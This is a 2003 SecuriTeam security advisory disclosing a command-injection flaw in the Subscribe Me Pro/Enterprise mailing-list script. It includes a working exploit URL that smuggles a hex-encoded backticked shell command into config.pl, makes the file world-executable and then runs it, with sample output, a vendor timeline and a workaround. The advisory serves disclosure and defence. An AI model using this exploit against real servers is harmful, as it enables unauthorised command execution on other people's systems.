[UNIX] Subscribe Me Pro/Enterprise Command Execution
From: SecuriTeam (support_at_securiteam.com)
Date: 12/22/03
- Previous message: SecuriTeam: "[NEWS] Security Vulnerability in Xerox Document Centre (Directory Traversal)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 22 Dec 2003 12:10:11 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Subscribe Me Pro/Enterprise Command Execution
------------------------------------------------------------------------
SUMMARY
<http://www.siteinteractive.com> Subscribe Me Pro/Enterprise is "a
mailing list management script developed by siteinteractive". Various
flaws exist in setup.pl that can allow an attacker to inject shell
commands using a back ticked variable injection flaw into config.pl, and
then exploiting a permission problem to execute config.pl.
DETAILS
Exploit:
This attack tricks the perl script setup.pl into thinking that you have
just installed Subscribe Me and wish to set it up. When doing this
setup.pl will attempt to write all your configuration variables to
config.pl. There is some input validation done in setup.pl, but this can
be easily bypassed by hex encoding all data that you send.
Run though of the exploit:
First we connect and inject our exploit command of '/usr/bin/id > id' and
tell setup.pl to create all files with a mode of 777.
http://victim.com/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl
&config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh
¬ification="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64`
%20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=.
This will return a page saying, "Please set your administration password"
(you will not be able to).
This has now written the following data to config.pl
$notification = "" .`/usr/bin/id > id` . ""; (note the back ticks)
Moreover, config.pl is now set to -rwxrwxrwx. Now we request
http://victim.com/cgi-bin/config.pl to execute our perl.
And respectively http://victim.com/cgi-bin/id is now created and contains:
uid=48(apache) gid=48(apache) groups=48(apache)
Using this exploit, it is possible to inject any system commands.
Vendor status:
Company was contacted via email (support@) on Monday 15 December, they
were notified that the exploit would be released on 19 December, and they
were told how to fix the problem. No reply was heard back from the
company, and no official fix has been released.
Workaround:
Remove setup.pl once installed, in addition chmod config.pl to read only.
ADDITIONAL INFORMATION
This advisory is also online at:
<http://www.pimp-industries.com/advsiory-0003.txt>
http://www.pimp-industries.com/advsiory-0003.txt.
The information has been provided by
<mailto:headpimp@pimp-industries.com> Paul Craig - Pimp Industries.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] Security Vulnerability in Xerox Document Centre (Directory Traversal)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
